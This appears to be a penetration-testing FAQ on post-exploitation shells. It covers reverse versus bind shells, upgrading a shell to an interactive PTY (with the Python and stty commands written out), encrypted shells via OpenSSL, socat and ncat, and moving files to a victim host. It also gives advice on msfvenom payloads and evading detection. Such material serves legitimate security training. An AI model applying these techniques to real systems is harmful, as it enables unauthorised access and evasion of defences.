When should I use reverse shell vs bind shell?

Use reverse shell almost always—it works through NAT, bypasses egress filtering, and is less detectable. Only use bind shell when you have inbound access to the victim and no outbound connectivity is available.

How do I upgrade a basic shell to interactive PTY?

Use Python: python3 -c 'import pty;pty.spawn("/bin/bash")' then Ctrl+Z, then on attacker run stty raw -echo; fg. Alternatives: script /dev/null -c bash or socat with full PTY support.

What's the difference between OpenSSL, socat, and ncat encrypted shells?

OpenSSL is simplest for basic encryption. Socat provides full PTY support and bidirectional encryption. Ncat is fastest to deploy with --ssl flag but less flexible. Choose based on available tools and PTY requirements.

How do I transfer files when wget/curl aren't available?

Use base64 encoding (no tools needed): base64 -w0 file on source, echo 'BASE64' | base64 -d > file on target. On Windows use PowerShell DownloadFile, certutil, or bitsadmin. SMB shares work for Windows-to-Windows transfers.

Should I use msfvenom payloads or language one-liners?

One-liners are faster and less detectable for initial access. Use msfvenom when you need binary payloads (EXE/DLL), staged Meterpreter shells, or when specific formats are required. Consider AV evasion techniques if payloads are blocked.
